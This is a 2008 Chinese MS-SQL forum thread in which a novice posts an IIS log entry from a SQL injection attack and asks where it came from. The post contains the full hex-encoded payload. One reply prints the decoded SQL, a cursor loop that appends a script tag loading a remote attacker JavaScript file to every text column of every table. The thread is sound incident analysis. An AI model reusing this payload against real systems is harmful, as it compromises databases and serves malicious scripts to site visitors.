sql注入 空间日志求强人解读!

weichengyun 2008-06-17 02:15:15
我菜鸟一个

强人帮忙!!!!
2008-06-13 10:35:31 W3SVC43539 MS-DUX8DQ8MNV55 218.85.134.172 POST /lyzx/listtrip.asp region2=3';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006800650069006800650069003100310037002E0063006E002F006B002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E00440020004300


我在找空间日志的时候,只有这些,谁帮我看看来源ip是什么啊 这日志是不是不完整??
...全文
46 点赞 收藏 5
写回复
5 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
weichengyun 2008-06-17
2楼非常感谢您的回复,218.85.134.172 是我主机的IP呢

能不能从这日志中 看到这操作来源的IP??
回复
chuifengde 2008-06-17
也就是用游标的方式在你所有的表中将字符类型为
ntext
nvarchar
sysname
text
varchar
的字段都修改了
回复
chuifengde 2008-06-17
这是@S的内容
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.heihei117.cn/k.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END C
回复
M1CR0S0FT 2008-06-17
218.85.134.172 POST
这里似乎已经显示了吧.
回复
weichengyun 2008-06-17
我是新人,分不是很多呢 所以只能出那么点点啊
回复
相关推荐
发帖
疑难问题
创建于2007-09-28

2.1w+

社区成员

MS-SQL Server 疑难问题
申请成为版主
帖子事件
创建了帖子
2008-06-17 02:15
社区公告
暂无公告